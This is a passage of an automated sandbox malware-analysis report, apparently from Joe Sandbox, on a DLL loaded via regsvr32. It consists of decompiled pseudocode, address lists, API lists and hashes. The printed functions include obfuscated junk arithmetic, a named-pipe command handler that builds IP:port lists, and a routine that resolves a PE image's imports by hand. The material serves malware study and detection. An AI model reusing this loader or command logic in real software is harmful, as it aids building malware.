				 *((intOrPtr*)(_t371 + 0x20)) = _t353 + 0xb56;
				_t332 = _t353 - 0x1e7b;
				 *((intOrPtr*)(_t371 + 0x7c)) = _t332;
				 *((intOrPtr*)(_t371 + 0x28)) = _t307 - 0x2db;
				 *((intOrPtr*)(_t371 + 0x70)) = _t357 - 0x69;
				_push(_t307 + 0x32);
				_push(_t363 + 0xfffffe4e);
				 *((intOrPtr*)(_t371 + 0x2c)) = _t300;
				_push(_t300 - 0x762);
				_push( *((intOrPtr*)(_t371 + 0x78)));
				_push(_t307 - 0x984);
				_push(_t307 - 0x984);
				_push(_t300 - 0xe15);
				_push( *((intOrPtr*)(_t371 + 0x80)) + 0xfffffea1);
				_push(_t300 - 0x547);
				_push(_t357 + 0x52c);
				_push(_t307);
				_push(_t357 - 0xea);
				_push(_t332 + 0x28a4);
				_t365 = E6D515588();
				_t198 =  *((intOrPtr*)(_t371 + 0x98));
				_t334 =  *((intOrPtr*)(_t371 + 0x50)) + 0x1e7b;
				 *((intOrPtr*)(_t371 + 0x8c)) = _t334;
				_push(_t198 - 0x3c4);
				_push(_t300 - 0xda2);
				_push(_t334);
				_push( *((intOrPtr*)(_t371 + 0xbc)) + 0x269);
				_push(_t357);
				_push(_t198 + 0xe2);
				_t41 = _t365 - 0x1b2; // -434
				_push( *((intOrPtr*)(_t371 + 0xb0)) + 0x42f);
				_t358 =  *(_t371 + 0xc0);
				_push(_t357 + 0x43a);
				_push(_t300 - 0x1dd);
				_push(_t358);
				_t205 = E6D51450E();
				_t335 =  *((intOrPtr*)(_t371 + 0x78));
				_t301 = _t205;
				_t206 =  *((intOrPtr*)(_t371 + 0xd0));
				_t372 = _t371 + 0x64;
				_push(_t206 + 0x977);
				_push(_t206 + 0x344);
				_push(_t335 - 0x7c9);
				_t52 = _t301 + 0x71c; // 0x71c
				_push(_t358);
				_push( *((intOrPtr*)(_t372 + 0x64)) + 0x1a7);
				_push( *((intOrPtr*)(_t372 + 0x7c)));
				_push(_t353 - 0x88);
				_push(_t335 + 0x111);
				_push(_t353 + 0x632);
				_push( *((intOrPtr*)(_t372 + 0x38)) + 0xfffff89e);
				_t58 = _t365 - 0x21b; // -539
				_push( *((intOrPtr*)(_t372 + 0x8c)) + 0x75c);
				_t60 = _t365 - 0x560; // -1376
				_t61 = _t365 + 0x129; // 0x129
				_t219 = E6D513E64();
				_t373 = _t372 + 0x3c;
				 *(_t373 + 0x28) = _t219;
				if(_t301 == _t353) {
					_t336 =  *(_t373 + 0x24);
					if(_t301 < _t336 + 0x90e) {
						_t65 = _t301 + 0xcfd; // 0xcfd
						_t355 = _t65;
						if( *(_t373 + 0x14) == _t355) {
							_t317 = _t358[0x52];
							 *(_t373 + 0x64) = _t317;
							_t358[0xa] = (_t358[0x2f] & _t336 & _t301) * _t358[0xa];
							_t226 =  *(_t373 + 0x7c) | 0x00002ac3;
							 *(_t373 + 0x50) = _t226;
							if(_t317 > _t226) {
								_t318 =  *(_t373 + 0x20);
								 *(_t373 + 0x28) = _t301 ^  *(_t373 + 0x1c);
								 *(_t373 + 0x24) = _t336 ^ 0x00001df3;
								 *(_t373 + 0x14) = _t301 * 0x00001e7b ^ 0x00002597;
								_t106 = _t365 - 0x2ea5; // -11941
								 *(_t373 + 0x30) = _t106 * _t318;
								 *(_t373 + 0x34) = _t318 | _t336 |  *(_t373 + 0x1c);
								_t238 =  *(_t373 + 0x78);
								 *(_t373 + 0x38) = _t238 & _t301;
								 *(_t373 + 0x3c) = _t365 * 0x29b2;
								 *((intOrPtr*)(_t373 + 0x40)) = _t238 + _t365;
								_t341 =  *_t358;
								 *((intOrPtr*)(_t373 + 0x48)) = (_t238 & _t318) + 0x252e;
								 *(_t373 + 0x44) = _t365 ^ _t318 | 0x00002ac3;
								 *(_t373 + 0x4c) =  *(_t373 + 0x18) |  *(_t373 + 0x10) | 0x00002749;
								do {
									_t244 =  *((intOrPtr*)(_t373 + 0x68));
									 *(_t373 + 0x2c) = _t341 &  *(_t373 + 0x28);
									_push( *(_t244 + 0xe4) *  *(_t244 + 0xe4) - 0x1e7b);
									_push( *(_t244 + 0x124) ^  *(_t244 + 8) | 0x00001eee);
									_push(( *(_t244 + 0x1a8) |  *(_t244 + 8)) +  *((intOrPtr*)(_t373 + 0x5c)));
									_push( *(_t373 + 0x64) * 0x1df3 -  *(_t373 + 0x1c));
									_push( *(_t373 + 0x78));
									_push(_t358[0x22] - 0x000021e9 ^ 0x00002c90);
									_push( *(_t373 + 0x3c));
									_push(_t358[0x46] * 0x2b78);
									_t251 = E6D5143A4(_t358[0x75] + _t318 & 0x00001eee,  *((intOrPtr*)(_t373 + 0x40)),  *(_t373 + 0x38), _t358[0x3a] & _t358[0x1a] & 0x00001df3);
									_t358 =  *(_t373 + 0x98);
									_t305 =  *(_t373 + 0xa8);
									_t322 = _t358[2];
									_push(_t322 |  *(_t373 + 0xac));
									_push( *(_t373 + 0x64));
									_push(_t358[0x3e] + _t305);
									_push( *((intOrPtr*)(_t373 + 0x70)));
									_push(_t358[0x4f] *  *(_t373 + 0xac) ^ _t358[0x17]);
									_push( *(_t373 + 0x7c));
									_push(_t305 - _t358[0x34]);
									_push( *((intOrPtr*)(_t373 + 0x88)));
									_push(_t358[0x24] & _t358[0x49]);
									_push( *((intOrPtr*)(_t373 + 0x6c)) - _t358[0x75]);
									_push( *(_t373 + 0x98));
									_push(_t358[0x1d] - _t305 | _t358[0xa]);
									_push(_t358);
									_push( *(_t373 + 0xa8));
									_push(_t322 -  *((intOrPtr*)(_t373 + 0x94)));
									_push( *(_t373 + 0xac) - _t251 - 0x21e9);
									E6D51A07D();
									_t373 = _t373 + 0x70;
									_push( *((intOrPtr*)(_t373 + 0x48)));
									LeaveCriticalSection( *(_t373 + 0x50));
									_t341 =  *_t358;
									_t358[0xf] = _t358[0xf] | (_t341 ^ 0x00001df3) +  *(_t373 + 0x18);
									if( *(_t373 + 0x10) <= ((_t358[0x4f] ^ _t305) & _t358[4])) {
										 *(_t373 + 0x60) =  *(_t373 + 0x60) | _t358[0x1d] |  *(_t373 + 0x1c);
									}
									_t318 =  *(_t373 + 0x20);
									_t276 =  *(_t373 + 0x64) + 2;
									 *(_t373 + 0x64) = _t276;
								} while (_t276 >  *(_t373 + 0x50));
							}
						} else {
							_t358[0x23] = _t358[0x7c];
							_t358[0x2f] = _t358[0x2f] - (_t358[0x4c] ^ 0x000024ad);
							_t280 = _t358[2];
							_t350 =  *((intOrPtr*)(_t280 + 0x4c)) - 0x424;
							while(_t350 <  *((intOrPtr*)(_t280 + 0x1c)) - 0x424) {
								_t350 = _t350 + 1;
								 *((intOrPtr*)(_t358[0x14] + 0xbc)) = _t358[0x24] - 0x252e;
								_t280 = _t358[2];
							}
							_t351 =  *(_t373 + 0x28);
							_t284 = 0xffffff98;
							 *((intOrPtr*)(_t358[0x1d] + 0x28)) =  *((intOrPtr*)(_t358[0x1d] + 0x28)) + _t284 - _t358;
							_t329 =  *(_t373 + 0x64);
							_push(_t355);
							_push(_t351 - 0x4b6);
							_push( *(_t373 + 0x1c) + 0xfffffc5b);
							_t86 = _t365 + 0x37a; // 0x37a
							_push(_t329);
							_push(_t329 - 0x9f7);
							_push(_t329);
							_t89 = _t365 + 0x129; // 0x129
							_t331 =  *(_t373 + 0x78) + 0xfffffe4e;
							_push( &(( *(_t373 + 0x98))[0xa74]));
							_push(_t351 - 0x52c);
							_push(_t331);
							_push( *((intOrPtr*)(_t373 + 0xa4)) + 0x36a);
							_push(_t331);
							_push(_t358);
							_push( *((intOrPtr*)(_t373 + 0x90)) + 0xfffffb5d);
							E6D5029E2();
							_t373 = _t373 + 0x3c;
						}
					}
				}
				return  *((intOrPtr*)(_t373 + 0x54));
			}







































            0x6d507691
            0x6d50769c
            0x6d5076a6
            0x6d5076aa
            0x6d5076b1
            0x6d5076bb
            0x6d5076bf
            0x6d5076cb
            0x6d5076cf
            0x6d5076d9
            0x6d5076e0
            0x6d5076eb
            0x6d5076ef
            0x6d5076fb
            0x6d5076ff
            0x6d507706
            0x6d50770d
            0x6d50770e
            0x6d507715
            0x6d507719
            0x6d50771a
            0x6d507724
            0x6d50772b
            0x6d507732
            0x6d50773f
            0x6d507746
            0x6d50774d
            0x6d50774e
            0x6d507755
            0x6d50775c
            0x6d507766
            0x6d507768
            0x6d50776f
            0x6d507775
            0x6d507787
            0x6d50778e
            0x6d507796
            0x6d50779d
            0x6d50779e
            0x6d50779f
            0x6d5077a0
            0x6d5077b3
            0x6d5077ba
            0x6d5077c1
            0x6d5077c8
            0x6d5077c9
            0x6d5077ca
            0x6d5077cf
            0x6d5077d3
            0x6d5077d5
            0x6d5077dc
            0x6d5077e5
            0x6d5077f0
            0x6d5077fc
            0x6d5077fd
            0x6d507804
            0x6d507805
            0x6d507806
            0x6d507810
            0x6d507817
            0x6d50781e
            0x6d507828
            0x6d507829
            0x6d50783c
            0x6d50783d
            0x6d507844
            0x6d50784b
            0x6d507850
            0x6d507853
            0x6d507859
            0x6d50785f
            0x6d50786b
            0x6d507871
            0x6d507871
            0x6d50787b
            0x6d507959
            0x6d507963
            0x6d50796b
            0x6d507972
            0x6d507977
            0x6d50797d
            0x6d507983
            0x6d50798d
            0x6d507998
            0x6d5079a7
            0x6d5079ab
            0x6d5079b4
            0x6d5079c0
            0x6d5079c4
            0x6d5079cc
            0x6d5079d6
            0x6d5079df
            0x6d5079e3
            0x6d5079ea
            0x6d507a03
            0x6d507a07
            0x6d507a0b
            0x6d507a0b
            0x6d507a4f
            0x6d507a7a
            0x6d507a83
            0x6d507a84
            0x6d507a89
            0x6d507a8a
            0x6d507a92
            0x6d507a93
            0x6d507a97
            0x6d507a9f
            0x6d507aa4
            0x6d507ab2
            0x6d507ac1
            0x6d507acd
            0x6d507ace
            0x6d507ae1
            0x6d507ae2
            0x6d507af7
            0x6d507af8
            0x6d507b04
            0x6d507b05
            0x6d507b18
            0x6d507b23
            0x6d507b24
            0x6d507b33
            0x6d507b34
            0x6d507b35
            0x6d507b3c
            0x6d507b3d
            0x6d507b3e
            0x6d507b43
            0x6d507b46
            0x6d507b4e
            0x6d507b54
            0x6d507b61
            0x6d507b73
            0x6d507b7c
            0x6d507b7c
            0x6d507b84
            0x6d507b88
            0x6d507b8b
            0x6d507b8f
            0x6d507a0b
            0x6d507881
            0x6d50788c
            0x6d50789d
            0x6d5078a3
            0x6d5078a9
            0x6d5078c6
            0x6d5078bc
            0x6d5078bd
            0x6d5078c3
            0x6d5078c3
            0x6d5078d2
            0x6d5078d8
            0x6d5078db
            0x6d5078e4
            0x6d5078e8
            0x6d5078e9
            0x6d5078f3
            0x6d5078f4
            0x6d5078fb
            0x6d507902
            0x6d507903
            0x6d507908
            0x6d507916
            0x6d507921
            0x6d507928
            0x6d507930
            0x6d507936
            0x6d50793e
            0x6d507944
            0x6d507945
            0x6d507946
            0x6d50794b
            0x6d50794b
            0x6d50787b
            0x6d50786b
            0x6d507ba4

            APIs
            • SNifCw242OCD._RSR(?,?,?,?,?,-FFFFF54B,?,?,?,?,?,?,?), ref: 6D50775D
            • Mqae01id._RSR(?,?,?,?,-000001B2,?,?,?,?,?,?,?,?,?,?,?), ref: 6D5077CA
            • LeaveCriticalSection.KERNEL32(?,?), ref: 6D507B4E
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: CriticalCw242LeaveMqae01idSection
            • String ID: V
            • API String ID: 1039995855-3571732617
            • Opcode ID: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction ID: 4500fdd40326e61316916a76484da3a45bc343e0338b3917c43096f6e4ba33a9
            • Opcode Fuzzy Hash: 03a1104c5bd03d2d4055a77696c54d7c90657510467734026d2d4be7f235ba05
            • Instruction Fuzzy Hash: 23E105B26087459FD725CF68C884E9BB7E9FB88304F048A6EE59AC7250D734E944CF52
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027A371E Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 310pipeCOMMON
            Download Yara Rule
            C-Code - Quality: 62%
            			E027A371E(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t136;
				signed int _t145;
				signed int _t147;
				signed short* _t148;
				signed int _t158;
				intOrPtr* _t182;
				void* _t186;
				void* _t187;
				void* _t188;
				signed short* _t191;
				void* _t195;
				signed int _t198;
				signed int _t199;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t207;
				void* _t209;
				void* _t215;
				void* _t222;

				_t222 = __fp0;
				_t209 = (_t207 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x27bf8e0; // 0x47ff8c0
					_push(0);
					_push( *0x27bf8c4);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x27bf8e0; // 0x47ff8c0
					_push(0x80000);
					_push( *0x27bf984);
					_push( *0x27bf8c4);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t148 =  *0x27bf984; // 0x0
						_t80 =  *_t148 & 0x0000ffff;
						_t215 = _t80 - 8;
						if(_t215 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E027B09E0( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t186);
								E027AD2AB(_t186);
								L32:
								L56:
								DisconnectNamedPipe( *0x27bf8c4);
								_push(0);
								_pop(0);
								_push(1);
								_pop(1);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E027A16B0( &_v204, _t222);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t145 = _v204;
								_t90 = _t145 * 0x16;
								_v184 = _t145 * 0x16;
								_t203 = E027A8D70(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t187 = 0xa;
									E027AD2AB(_t187);
									L52:
									E027A8D86( &_v188, _t145);
									goto L32;
								}
								_t198 = 0;
								__eflags = _t145;
								if(_t145 == 0) {
									L50:
									_push(E027AA5DA(_t203));
									_push(_t203);
									_t188 = 5;
									E027AD2AB(_t188);
									E027A8D86( &_v192, 0xffffffff);
									_t209 = _t209 + 0x10;
									goto L52;
								}
								_t158 = _v188 + 4;
								__eflags = _t158;
								_v204 = _t158;
								do {
									__eflags = _t198;
									if(_t198 != 0) {
										__eflags = _t198 - _t145 - 1;
										if(_t198 < _t145 - 1) {
											_t102 = E027AA5DA(_t203);
											_t158 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t158;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E027AA5DA(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E027AA5DA(_t203) + _t203;
										__eflags = _t110;
										E027A9FAF(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t158 = _v204;
										_t209 = _t209 + 0x20;
									}
									_t198 = _t198 + 1;
									_t158 = _t158 + 0x20;
									_v204 = _t158;
									__eflags = _t198 - _t145;
								} while (_t198 < _t145);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E027A16B0( &_v204, _t222);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E027A8D86( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t215 == 0) {
							_t84 = E027B09E0( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t199 = E027A9CD0( &(_t148[4]), 0x20, 1,  &_v176);
							_v196 = _t199;
							__eflags = _t199;
							if(_t199 == 0) {
								L30:
								_t191 =  *0x27bf984; // 0x0
								E027AA078( &_v164,  &(_t191[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E027A1D6E(E027AA10C( *_t199, __eflags), 0, 0, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E027A8D70(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t147 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E027A1D6E(E027AA10C( *_t199, __eflags), _t127, _v184, 0);
								_t209 = _t209 + 0x10;
								_v168 = _t129;
								E027A9DC9( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E027A9A1D( *((intOrPtr*)(_t199 + _t147 * 4)), E027AA5DA( *((intOrPtr*)(_t199 + _t147 * 4))));
								_t182 = _v204;
								_t147 = _t147 + 1;
								 *_t182 = _t132;
								_v204 = _t182 + 4;
								__eflags = _t147 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t195 = 5;
							E027AD2AB(_t195);
							 *0x27bf9b8 = 1;
							_v172 = 1;
							goto L56;
						}
						_t136 = _t133;
						if(_t136 == 0) {
							_t84 = E027B09BE( &_v200);
							goto L16;
						}
						if(_t136 != 1) {
							goto L56;
						}
						E027B09BE( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































            0x027a371e
            0x027a3724
            0x027a3731
            0x027a3736
            0x027a373a
            0x027a373a
            0x027a373f
            0x027a3740
            0x027a3746
            0x027a3752
            0x00000000
            0x00000000
            0x027a3765
            0x027a376a
            0x027a376b
            0x027a3770
            0x027a3775
            0x027a377b
            0x027a3789
            0x027a3a95
            0x00000000
            0x027a379a
            0x027a379a
            0x027a37a0
            0x027a37a3
            0x027a37a6
            0x027a3914
            0x027a3914
            0x027a3917
            0x027a3a8b
            0x027a37d5
            0x027a37d6
            0x027a37da
            0x027a37da
            0x027a37dc
            0x027a37dc
            0x027a37dd
            0x027a38f8
            0x027a38f8
            0x027a38f9
            0x027a38fe
            0x027a3a9b
            0x027a3aa1
            0x027a3aac
            0x027a3aae
            0x027a3aaf
            0x027a3ab1
            0x027a3ab2
            0x00000000
            0x00000000
            0x00000000
            0x027a3ab2
            0x027a391e
            0x027a391e
            0x027a3921
            0x027a3966
            0x027a396a
            0x027a396f
            0x027a3973
            0x027a3975
            0x027a3a76
            0x027a3a7c
            0x027a3a80
            0x027a37fb
            0x027a37fb
            0x00000000
            0x027a37fb
            0x027a397b
            0x027a397f
            0x027a3983
            0x027a398c
            0x027a398e
            0x027a3993
            0x027a3995
            0x027a3a50
            0x027a3a50
            0x027a3a50
            0x027a3a59
            0x027a3a5b
            0x027a3a5e
            0x027a3a5f
            0x027a3a66
            0x027a3a6c
            0x00000000
            0x027a3a6c
            0x027a399b
            0x027a399d
            0x027a399f
            0x027a3a2e
            0x027a3a35
            0x027a3a36
            0x027a3a39
            0x027a3a3a
            0x027a3a46
            0x027a3a4b
            0x00000000
            0x027a3a4b
            0x027a39a9
            0x027a39a9
            0x027a39ac
            0x027a39b0
            0x027a39b0
            0x027a39b2
            0x027a39b7
            0x027a39b9
            0x027a39bc
            0x027a39c2
            0x027a39c6
            0x027a39c6
            0x027a39b9
            0x027a39cc
            0x027a39ce
            0x027a39d2
            0x027a39d4
            0x027a39d7
            0x027a39de
            0x027a39e7
            0x027a39ed
            0x027a39f2
            0x027a39fb
            0x027a3a13
            0x027a3a13
            0x027a3a16
            0x027a3a1b
            0x027a3a1f
            0x027a3a1f
            0x027a3a22
            0x027a3a23
            0x027a3a26
            0x027a3a2a
            0x027a3a2a
            0x00000000
            0x027a39b0
            0x027a3923
            0x027a3926
            0x00000000
            0x00000000
            0x027a3930
            0x027a3934
            0x027a3939
            0x027a393d
            0x027a3941
            0x027a3943
            0x027a394b
            0x027a3951
            0x027a3955
            0x027a3959
            0x00000000
            0x027a3959
            0x027a37ac
            0x027a390a
            0x027a37ee
            0x027a37ef
            0x027a37f1
            0x027a37f9
            0x027a37fa
            0x00000000
            0x027a37fa
            0x027a37f3
            0x00000000
            0x027a37f3
            0x027a37b2
            0x027a37b5
            0x027a382d
            0x027a382f
            0x027a3835
            0x027a3837
            0x027a38d4
            0x027a38d4
            0x027a38e6
            0x027a38ec
            0x027a38f5
            0x027a38f6
            0x00000000
            0x027a38f6
            0x027a383d
            0x027a3841
            0x027a3844
            0x027a38c8
            0x027a38cd
            0x027a38d0
            0x00000000
            0x027a38d0
            0x027a3846
            0x027a3849
            0x027a3851
            0x027a3856
            0x027a385b
            0x027a385d
            0x00000000
            0x00000000
            0x027a3861
            0x027a3862
            0x027a3864
            0x027a3893
            0x027a38a2
            0x027a38a7
            0x027a38aa
            0x027a38b6
            0x00000000
            0x027a38b6
            0x027a3866
            0x027a386a
            0x027a3878
            0x027a387d
            0x027a3881
            0x027a3882
            0x027a3887
            0x027a388b
            0x027a388b
            0x027a388f
            0x00000000
            0x027a388f
            0x027a37b7
            0x027a37ba
            0x027a3802
            0x027a3803
            0x027a3806
            0x027a3807
            0x027a380e
            0x027a3814
            0x00000000
            0x027a3814
            0x027a37bd
            0x027a37c0
            0x027a37e9
            0x00000000
            0x027a37e9
            0x027a37c5
            0x00000000
            0x00000000
            0x027a37d0
            0x00000000
            0x027a37d0
            0x027a3789
            0x027a3ac0

            APIs
            • GetLastError.KERNEL32 ref: 027A3754
              • Part of subcall function 027AD2AB: FlushFileBuffers.KERNEL32(00000000,?,027A3A64,00000000,00000004), ref: 027AD2F1
            • DisconnectNamedPipe.KERNEL32 ref: 027A3AA1
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
            • String ID: %u.%u.%u.%u:%u
            • API String ID: 465096328-3858738763
            • Opcode ID: 3c1f8601bc31e019b1bc1cd57e3db227f67f15d0399fd92776892c305789d2e5
            • Instruction ID: 39a3b88aaba031f23b4954000d955a4fb028bf92a747afd754a3428599415970
            • Opcode Fuzzy Hash: 3c1f8601bc31e019b1bc1cd57e3db227f67f15d0399fd92776892c305789d2e5
            • Instruction Fuzzy Hash: CCA1BEB2508302AFD315DF28D8A9A6BB7E9EFC8734F008A5EF55596180DB34D904CF62
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B3789 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 50%
            			E027B3789(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E027AF0A4(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























            0x027b3789
            0x027b378f
            0x027b3797
            0x027b37ac
            0x027b37be
            0x027b37ca
            0x027b37d0
            0x027b37d5
            0x027b37e1
            0x027b394c
            0x00000000
            0x027b394c
            0x027b37e7
            0x027b37f0
            0x027b37fe
            0x027b3801
            0x027b3810
            0x027b3810
            0x027b3817
            0x027b3825
            0x027b3828
            0x027b3845
            0x027b384c
            0x027b385c
            0x027b3874
            0x027b385e
            0x027b3866
            0x027b3866
            0x027b3877
            0x027b387b
            0x027b3887
            0x027b388b
            0x027b388f
            0x027b3893
            0x027b389f
            0x027b38ca
            0x027b38d2
            0x027b38e4
            0x027b38f0
            0x027b38a1
            0x027b38a6
            0x027b38b1
            0x027b38bd
            0x027b38bd
            0x027b38f9
            0x027b38ff
            0x027b3909
            0x027b3925
            0x027b390b
            0x027b391a
            0x027b391a
            0x027b3909
            0x027b392d
            0x027b3936
            0x027b3936
            0x027b3944
            0x00000000
            0x027b3944
            0x027b3850
            0x00000000
            0x027b3850
            0x00000000
            0x027b3828
            0x00000000

            APIs
            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 027B37A6
            • LoadLibraryA.KERNEL32(00000000), ref: 027B383F
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: HandleLibraryLoadModule
            • String ID: GetProcAddress$kernel32.dll
            • API String ID: 4133054770-1584408056
            • Opcode ID: bf4c712631a0f2e348e31a80c934b087bafa1b2c910ee7c6d4aa6f8a2e88dbb1
            • Instruction ID: 66fe3e767349096d7bf8fa6618c904a47d89455e3013dc0a4960b7bf99c6f0f8
            • Opcode Fuzzy Hash: bf4c712631a0f2e348e31a80c934b087bafa1b2c910ee7c6d4aa6f8a2e88dbb1
            • Instruction Fuzzy Hash: DB616E75D00209EFDB11CF98C585BEDBBB1FF08329F248599E915AB291C774AA80CF54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027B4180 Relevance: 6.6, APIs: 5, Instructions: 341COMMON
            Download Yara Rule
            C-Code - Quality: 99%
